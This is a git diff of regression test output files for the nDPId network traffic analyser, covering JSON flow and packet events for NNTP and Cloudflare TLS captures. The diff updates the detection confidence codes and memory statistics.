00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":4921,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1258844993785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872419 bytes -~~ total memory freed........: 5872419 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6006053 bytes +~~ total memory freed........: 6006053 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 684 chars diff --git a/test/results/no_sni.pcap.out b/test/results/no_sni.pcap.out index 54e9f4678..1b327d165 100644 --- a/test/results/no_sni.pcap.out +++ b/test/results/no_sni.pcap.out @@ -2,21 +2,21 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1604822444474} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -29,32 +29,32 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} 